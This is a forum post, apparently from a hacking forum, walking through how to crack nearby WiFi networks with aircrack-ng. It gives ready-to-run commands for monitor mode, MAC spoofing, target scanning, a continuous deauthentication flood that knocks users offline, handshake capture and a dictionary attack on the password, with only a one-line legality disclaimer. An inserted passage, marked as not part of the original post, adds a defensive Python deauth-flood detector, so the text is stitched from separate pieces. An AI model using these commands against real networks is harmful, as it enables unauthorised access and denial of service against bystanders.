hello, been on hackforums for a week or two now and seen some great tutorials and overall threads and learned a lot in the process, it's by far the best community forum i've ever seen, so with that said i felt it's my time to contribute :)

and first off i'd like to say that i am in no way an expert in this subject, i'm sure there are way better ways out there, but this way works for me and it's what i'm using, so feel free to comment if there is anything you feel is worth mentioning! so let's begin!


how to hack nearby wifis with aircrack-ng

what you will need:
linux distro (i'm running ubuntu)
aircrack-ng
( sudo apt-get install aircrack-ng )
macchanger
( sudo apt-get install macchanger )

disclaimer: hacking into a network which is not your own or which you do not have permission to test is illegal, so do this on your own wifi

first off you will need to put your wireless card in monitor mode to be able to airodump it.

type the following:

ifconfig
( locate your wireless interface, mine is wlp3s0 )
sudo ifconfig wlp3s0 down
iwconfig wlp3s0 mode monitor

after that we need to kill a few processes that will interfere with aircrack-ng.

type:
airmon-ng check wlp3s0

a list of processes will come up, networkmanager is one of them, simply type
kill <the pid shown for that process>

when that's done you can go ahead and spoof your mac address. ( you don't need to do this, but better safe than sorry )

type:
macchanger -r wlp3s0

this will change your current mac address to a random one, hence the "-r" in the command.

and then once more, to make sure the wireless card is in monitor mode:
iwconfig wlp3s0 mode monitor
( it has a tendency to jump back to managed mode after killing the processes, at least for me )
ifconfig wlp3s0 up

now we will start to actually find the wifi in question, type:

airodump-ng wlp3s0

this will list all wifis near enough to get a signal. it will display the bssid (the access point's mac address), which channel they're on, what kind of encryption they have, and ofc the essid (the wifi's name).

once you've found your target, press ctrl+c to stop the scan.

then you do a more specific airodump by typing the following:

airodump-ng -c <the channel your target is on> -w <a name for your file> --bssid <the mac address of your target> wlp3s0


this will start an airodump scan on your target only. so why did we type -w ? to crack the password we need to capture a handshake, and that needs a file to save it to; this will be saved in a .cap file.

so while that is scanning, open up a new terminal ( ctrl+alt+t ), because now we need to deauthenticate the users currently on the target wifi. type:

aireplay-ng -0 0 -a <bssid> wlp3s0

this will jam the signal for the target's network (a dos), so everyone connected to it will disconnect. the second 0 in the command means it will keep going until you stop it; you can for example put a 5 there and it will send only 5 deauth frames and then stop. let it run for a few seconds, then ctrl+c to stop it. now go back to your airodump window, give it a few seconds, and in the top right corner there should now be a handshake (hard to miss). that means we are done and have captured what we need, so we can stop all the scans.
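worth knowing from the other side: that deauth burst is very loud on the air, and anyone watching a monitor-mode capture can spot it. this is an added example (not part of the original post, and not aircrack-ng code): a small python script that parses raw 802.11 management frames (it assumes the radiotap header has already been stripped) and flags any bssid that has sent more than a handful of deauth/disassoc frames, run here over constructed sample frames rather than a real capture.

```python
import struct
from collections import Counter

MGMT = 0           # 802.11 frame type 0 = management
DEAUTH = 0x0C      # management subtype 12 = deauthentication
DISASSOC = 0x0A    # management subtype 10 = disassociation
BROADCAST = "ff:ff:ff:ff:ff:ff"

def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)

def parse_mgmt(frame):
    """Decode the 24-byte 802.11 MAC header (radiotap already stripped, an assumption).
    Returns (type, subtype, dst, src, bssid, reason) or None if truncated."""
    if len(frame) < 24:
        return None
    fc = frame[0]                              # frame control, first byte
    ftype, subtype = (fc >> 2) & 0x3, (fc >> 4) & 0xF
    dst, src, bssid = mac_str(frame[4:10]), mac_str(frame[10:16]), mac_str(frame[16:22])
    reason = None                              # only deauth/disassoc carry a reason code
    if ftype == MGMT and subtype in (DEAUTH, DISASSOC) and len(frame) >= 26:
        reason = struct.unpack("<H", frame[24:26])[0]   # little-endian reason code
    return ftype, subtype, dst, src, bssid, reason

def deauth_flood_alerts(frames, threshold=10):
    """Count deauth/disassoc frames per BSSID and return those at or above the threshold;
    an AP legitimately sends a few, a jamming run sends hundreds, mostly to broadcast."""
    total, bcast = Counter(), Counter()
    for frame in frames:
        parsed = parse_mgmt(frame)
        if parsed is None:
            continue
        ftype, subtype, dst, _src, bssid, _reason = parsed
        if ftype != MGMT or subtype not in (DEAUTH, DISASSOC):
            continue
        total[bssid] += 1
        if dst == BROADCAST:
            bcast[bssid] += 1
    return {b: {"count": n, "broadcast": bcast[b]}
            for b, n in total.items() if n >= threshold}

# Constructed sample frames, not a real capture: FC(2) duration(2) addr1 addr2 addr3 seq(2),
# followed by a 2-byte reason code on the deauth frames; the MACs are made up.
BEACON = bytes.fromhex("8000 0000 ffffffffffff 020000000001 020000000001 0000")
DEAUTH_BCAST = bytes.fromhex("c000 0000 ffffffffffff 020000000001 020000000001 0000 0700")
DEAUTH_SINGLE = bytes.fromhex("c000 0000 020000000002 020000000009 020000000009 0000 0300")
SAMPLE_FRAMES = [BEACON] * 5 + [DEAUTH_BCAST] * 25 + [DEAUTH_SINGLE]
```

on the access point side the actual fix is 802.11w (protected management frames), which makes clients drop unauthenticated deauth frames instead of honouring them.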

now there are numerous ways of cracking a password (probably more ways than i know of), but we are going to do a dictionary attack.

so what is a dictionary attack? it's when you try every word listed in a dictionary, or a wordlist as it is called. there are tons of wordlists available online, just google them and you will find a few. i believe aircrack-ng even has a wordlist included called rockyou.txt which you can use. to execute this you type the following:

aircrack-ng <name>.cap -w <full path to the wordlist>
example:
aircrack-ng lolfile01.cap -w /home/desktop/wordlist.txt

and there you go! if the password matches any of the words in your wordlist then you've successfully managed to hack the wifi! hope this helps you, and feel free to ask if there is anything you are confused about. sorry if this tutorial is a bit blurry, this is my first tutorial, like ever, so feel free to leave suggestions of what i could improve for next time!

and also, typing
reboot
in your terminal will restore all the processes you've killed and put your wireless card back into managed mode as usual!

cryptic5